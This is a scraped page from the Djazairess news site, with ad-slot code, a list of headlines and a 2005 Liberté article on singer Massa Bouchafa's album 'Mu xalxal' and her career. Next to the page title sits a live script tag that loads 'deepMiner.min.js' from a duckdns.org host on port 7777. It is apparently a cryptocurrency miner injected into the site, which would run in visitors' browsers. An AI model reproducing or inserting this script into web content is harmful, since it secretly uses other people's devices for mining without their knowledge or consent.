googletag.defineSlot('/21620968445/Djazairess_Fr_Article_1', [[336, 280], [300, 300], [300, 250], [300, 600]], 'div-gpt-ad-142634874-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_1', 'div-gpt-ad-142634874-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Article_3', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-142634876-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_3', 'div-gpt-ad-142634876-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Article_2', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-142634875-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_2', 'div-gpt-ad-142634875-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Widget', [[222, 280]], 'div-gpt-ad-1524625614-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Widget', 'div-gpt-ad-1524625614-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Siteunder', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-930032573-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Siteunder', 'div-gpt-ad-930032573-0-oop').addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices();}); Djazairess : Une voix qui émerveille<script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>
 
En bref…    La démission surprise d'Ould Abbès    Louisa Hanoune fustige les partisans de la «continuité»    Un élu de l'APW pour représenter le FLN    La sous-traitance représente 10% de l'activité    Marchés pétroliers : La surabondance annonce-t-elle une mauvaise année ?    Un dialogue pour désamorcer la crise    Libye, la quadrature du cercle    Jamal Khashoggi, Ankara enfonce Riyad par petites doses    Votre week-end sportif    Violences dans les gradins du 5-Juillet    Le Mouloudia a mal de ses recrues estivales    Campagne d'information pour expliquer le projet    Plus de 33 000 pétards saisis à Djimla    Des dizaines de villageois de Souk-Lekhmis bloquent le CW15    Six millions d'Algériens sont diabétiques    Zombies-Land !    Logements sociaux : Les recalés des listes des bénéficiaires protestent    Assassinat par la DST en novembre 1954 de Kacem Zeddour Mohammed-Brahim Une affaire d'Etat    WA Tlemcen: Biskra, un cap important pour le Widad    USM Bel-Abbès: Un exploit qui en appelle d'autres    FLN: Ould Abbès démissionne    Ce n'est pas Trump le problème mais l'Amérique qui l'a élu    Europe: «Brexit or not Brexit ?»    Le pétrole, toujours    Le FFS dénonce: Le projet de loi de finances 2019 «présenté de façon expéditive»    Skikda: Saisie de kif, 8 arrestations    Suite aux nombreuses opérations de relogement: Des terrains combinés de proximité pour les nouveaux pôles urbains    Lycée Dergham Hanifi: La police sensibilise les élèves sur les dangers de l'Internet    Présidentielle : on se perd en conjectures !    EN - Les Verts dès demain à Lomé: Belmadi mobilise ses troupes    France 1914-1918 : centenaire de l'Armistice, le 11 novembre    Le virus des primaires    Est-il Halal de prier à la grande mosquée d'Alger ?    Hamas plonge Israël dans une crise politique    FLN : Démission de M. Ould Abbes pour des raisons de santé    Bedoui : " L'Algérie est sur de bons rails vers un lendemain meilleur "    Situation économique et sociale alarmante dans la wilaya de Khenchela :    FLN : Ould Abbès "débarqué"    Des otages druzes libérés portent en triomphe Bachar el-Assad    Les assiettes foncières inexploitées seront mises à la disposition des porteurs de projets    Arnaud Montebourg nouveau président de l'Association    2e édition du prix Cheikh Abdelkrim-Dali à Alger    L'étape d'Alger a coûté 5 MD    «Nous allons à Lomé pour la gagne»    Le Hamas et l'Etat hebreu: Crise politique en Israël    L'échec programmé de Rome    Disney : Les exploits des super-héros font les affaires de Mickey    







Merci d'avoir signalé!
Cette image sera automatiquement bloquée après qu'elle soit signalée par plusieurs personnes.





Une voix qui émerveille
Le nouvel album de Massa Bouchafa
Publié dans Liberté le 06 - 09 - 2005

La nouvelle cassette intitulée “Mu xalxal” qui veut dire en berbère “celle (la femme) qui porte le bracelet”, comporte huit chansons de joie et de fête – toutes si bien faites, si bien arrangées, par M. Bouchafa Mhand, manager de Massa. La chanteuse des fêtes revient pour donner de nouvelles couleurs à sa musique et enchanter ses fans.
Plaisant, cool, insolent, le nouvel album de Massa Bouchafa est arrivé, sans se presser… L'album, en tout cas, arrive au bon moment, coïncidant avec le début de l'été, synonyme de joie, de fêtes et de mariages.
La nouvelle cassette intitulée Mu xalxal qui veut dire en berbère “celle (la femme) qui porte le bracelet”, comporte huit chansons de joie et de fêtes – toutes si bien faites, si bien arrangées, par M. Bouchafa Mhand, manager de Massa.
Cheveux courts ondulés, bouche fruitée, corps de liane, Massa Bouchafa, si elle ne s'appelle pas “Paradis”, elle y ressemble quelque peu. Cette créature de rêve ne se contente pas seulement de chanter. Avec son mari, elle forme le couple le plus branché de l'avant-garde “house” de la chanson et de la musique kabyles. Massa Bouchafa a à son actif plusieurs albums ainsi que des enregistrements radiophoniques et télévisuels. À travers ses produits, on perçoit la subtilité de la femme et de ses passions. Elle est d'une finesse diabolique. Tout cela, elle le fait avec une vivacité de langue qui crée un rare plaisir d'intelligence. Elle chante là où il faudrait s'abandonner, n'être qu'un esprit, que chair avec la chair. Grâce à sa merveilleuse voix et ses danses qui accompagnent ses chansons, elle n'a pas forcé son destin pour se faire adopter. Lors de sa tournée estivale qui l'a menée à travers toute la Kabylie (Tizi Ouzou, Béjaïa, Bouira, Boumerdès, etc.) où elle a animé plusieurs fêtes de mariages, Massa Bouchafa survole tout son répertoire connu de tous les mélomanes. À Bouzeguène, le public, qui l'apprécie beaucoup, a exigé d'elle l'interprétation des nouvelles chansons. Elle a répondu à leur souhait. Et voilà Mu xalxal, Lbabur, Tislit (la mariée), Tarwiht-iw (mon âme), Agujil (l'orphelin), etc., huit chansons en non-stop.
L'itinéraire de Massa Bouchafa est assez éloquent. Ses débuts qui remontent à 1989, lors de l'émission de télévision “Alhan oua chabab” ont été une révélation pour le jury comme pour le public. Elle obtiendra, on s'en souvient, le deuxième prix du 8e festival de la chanson folklorique organisé par le Comité des fêtes de la ville d'Alger. L'émission “Thimlilit netmedit” de la Chaîne II la propulsera davantage dans le monde de la chanson kabyle.
À un moment crucial où les revendications berbères prennent les devants de la scène, elle s'est fait connaître et s'imposa par son inoubliable chanson Dda L'Mulud, en hommage à Mouloud Mammeri. Massa Bouchafa, rappelons-le, a enregistré son premier album en 1990 aux éditions El Hillal.
Massa Bouchafa, Mu xalxal, un album produit par Zerda et distribué par Igawawen. Disponible dans tous les cassettothèques.
C. Nath Oukaci


Cliquez ici pour lire l'article depuis sa source.